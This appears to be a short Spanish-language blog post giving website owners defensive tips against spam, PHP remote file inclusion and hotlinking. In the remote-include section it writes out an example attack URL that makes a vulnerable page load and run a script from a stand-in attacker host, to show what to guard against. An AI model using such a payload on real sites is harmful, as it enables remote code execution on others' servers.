Ok, este post trata sobre algunos abusos comunes y como evitarlos.
SPAM:
- Es TODO un tema el spam, por experiencias personales recomiendo no colocar formularios del estilo "recomendar este sitio" y si los colocamos que tengan CAPTCHA sí o sí. Parece increible pero alguna gente envía basura por medio de formularios de recomendación de sitios web!.
-
Otra cosa recomendable dar de baja la cuenta de email por defecto que nos da el proveedor de hosting (o ponerle una cuota de disco de 0), ya que suele tener el mismo nombre del dominio y es blanco fácil. Siempre tenemos la opción de crear crear una cuenta de correo distinta.
-
NO emplear la opción de "catch-all" de las cuentas de correo (se suele configurar desde el panel de control del dominio). Esta opción nos permite redirigir cualquier email enviado a una dirección del estilo *@midominio.com a otra casilla (y en caso de que * no sea una casilla válida la reenvía igual). Naturalmente * representa cualquier nombre válido para un email. Hay muchos spammers que usarán nuestras cuentas (existentes o no) para hacerse pasar por nosotros y enviar emails y cuando esos emails reboten si tenemos configurada la opción "catch-all" nos llenaremos de toneladas de basura.
- SIEMPRE usar CAPTCHAS en todos los formularios públicos. Con públicos me refiero a todos aquellos que se pueden acceder sin necesidad de un usuario y clave.
includes remotos:
- un include remoto es un tipo de ataque que consiste en intentar incluir/ejecutar un código maligno ubicado en otro servidor en un servidor nuestro. Este tipo de ataque es mas común de lo que se cree. Los hackers que usan este ataque suelen dar con las víctimas buscando en motores de búsqueda aquellos sitios que tengan como URL algo del estilo: "index.php?page=pageX.php". Una vez que encuentran un sitio así intentan incluir código remoto de la siguiente forma: "index.php?page=http://teRompoElSitio.com/scriptMaligno.txt" notar que la extensión del script es "txt" pero esto poco importa porque una vez que se incluya en la página será interpretado como código PHP por nuestro web server.
Entonces, las formas de cubrirse contra estos ataques son: 1) asegurarse que nuestro servidor esta configurado de forma tal de NO permitir includes remotos o 2)directamente evitar usar esta estructura de URL o 3) camuflar las URL mediante renombre.
Hot Linking y Ataques de Denegación de Servicio (DoS):
- Hot Linking no tiene traducción directa al criollo pero significa que otro(s) sitio(s) está haciendo uso de nuestros recursos (imágenes, archivos, videos) sin nuestra autorización y por lo tanto nos está quitanto ancho de banda (y a la larga nos hará perder dinero, si nos consume todo el ancho disponible). Imaginemos que tenemos un video de 5 megas llamado video1.mpg en el directorio raíz de nuestro sitio web. Entonces los sitios A, B y C incluyen este video de forma embebida en alguna de sus páginas. Cada vez que un visitante de A, B o C vea el video lo estará descargando de NUESTRO servidor web y entonces estará consumiendo NUESTRO ancho de banda disponible. La mejor forma de evitar esto es creando un filtro en el archivo .htaccess (que por supuesto estará al mismo nivel que el archivo de video en este ejemplo). Algunos colegas me comentaron que encontraron una forma práctica y gratuita de hacer publicidad, y claro!, basta reemplazar el archivo linkeado por otro con una publicidad nuestra y estaremos mostrando anuncios en sitios que nos roban ancho de banda!.
Espero les den resultados estas recomendaciones, hay muchos otros tipos de ataques que iré comentando a medida que tenga tiempo libre.
chau!
W.
quejas y reclamos